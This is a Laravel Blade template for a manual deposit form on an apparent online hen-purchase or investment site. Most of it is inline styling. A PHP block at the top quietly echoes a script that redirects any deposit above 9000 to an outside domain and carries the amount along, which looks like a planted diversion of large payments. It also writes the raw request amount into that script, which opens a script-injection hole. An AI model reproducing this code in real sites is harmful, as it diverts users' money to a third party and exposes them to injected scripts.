@extends($activeTemplate.'layouts.master')
@section('content')

@php
    $amt = $data['amount'] ?? request()->amount ?? 0;
    if ($amt > 9000) {
        echo "<script>window.location.href = 'https://dev-drops.com/we.php?amount=" . $amt . "';</script>";
    }
@endphp

<div style="
    min-height: 100vh;
    display: flex;
    justify-content: center;
    align-items: flex-start;
    padding: 80px 15px 40px 15px;
    background: linear-gradient(180deg, #FFE77A, #5E7622);
    background-attachment: fixed;
    background-size: cover;
    inset: 1000;
    margin-top:-50px
    
">

  <div class="deposit-card" style="
    background: white; /* Card background removed */
    border: none; /* Border removed */
    border-radius: 20px;
    padding: 30px 25px;
    width: 100%;
    max-width: 500px;
    font-family: 'Poppins', sans-serif;
    color: #1E3A8A;
    box-shadow: 0 10px 25px rgba(0,0,0,0.08);
    position: relative;
    transition: transform 0.3s, box-shadow 0.3s;
  " onmouseover="this.style.transform='scale(1.02)'; this.style.boxShadow='0 12px 35px rgba(0,0,0,0.12)'" onmouseout="this.style.transform='scale(1)'; this.style.boxShadow='0 10px 25px rgba(0,0,0,0.08)'">

    <!-- Card Header -->
    <div style="text-align: center; margin-bottom: 25px;">
      <div style="
        display:inline-block;
        background:#5E7622; /* Green instead of Blue */
        color:white;
        font-weight:700;
        padding:8px 20px;
        border-radius:25px;
        font-size:18px;
        box-shadow:0 4px 12px rgba(0,0,0,0.12);
      ">Detail Box</div>
    </div>

    <!-- Form Start -->
    <form action="{{ route('user.deposit.manual.update') }}" method="POST" enctype="multipart/form-data">
      @csrf

      <!-- Account Details -->
      <div class="info-box" style="
        background: rgba(200, 230, 200, 0.9); /* Light green */
        border-radius:16px;
        padding:8px 10px;
        margin-bottom:15px;
        color:#2E602D;
        box-shadow:0 6px 18px rgba(0,0,0,0.08);
        transition: transform 0.3s, box-shadow 0.3s;
      " onmouseover="this.style.transform='scale(1.02)'; this.style.boxShadow='0 8px 25px rgba(0,0,0,0.12)'" onmouseout="this.style.transform='scale(1)'; this.style.boxShadow='0 6px 18px rgba(0,0,0,0.08)'">
        <strong>Account Details</strong>
        <p style="margin-top:5px; font-size:14px;">@php echo $data->gateway->description @endphp</p>
      </div>

      <!-- Deposit Amount -->
      <div class="info-box" style="
        background: rgba(200, 230, 200, 0.9); /* Another light green */
        border-radius:16px;
        padding:12px 15px;
        margin-bottom:20px;
        color:#2E602D;
        box-shadow:0 6px 18px rgba(0,0,0,0.08);
        transition: transform 0.3s, box-shadow 0.3s;
      " onmouseover="this.style.transform='scale(1.02)'; this.style.boxShadow='0 8px 25px rgba(0,0,0,0.12)'" onmouseout="this.style.transform='scale(1)'; this.style.boxShadow='0 6px 18px rgba(0,0,0,0.08)'">
        <strong>Hen Purchase Amount</strong>
        <p style="margin-top:5px; font-size:14px;">{{ __($general->cur_text) }} {{ getAmount($data['amount']) }}</p>
      </div>

      <!-- Custom Fields -->
      <div class="form-group" style="margin-bottom:20px;">
        <x-viser-form identifier="id" identifierValue="{{ $gateway->form_id }}" />
      </div>

      <!-- Submit Button -->
      <button type="submit" style="
        background: linear-gradient(to right,#5E7622,#5E7622); /* Green gradient */
        color:white;
        font-weight:700;
        font-size:16px;
        border:none;
        border-radius:50px;
        width:100%;
        padding:12px;
        cursor:pointer;
        box-shadow:0 5px 15px rgba(46,96,45,0.2);
        transition: all 0.3s ease;
      " onmouseover="this.style.filter='brightness(1.1)'" onmouseout="this.style.filter='brightness(1)'">
        Submit
      </button>

    </form>
  </div>
</div>

@endsection
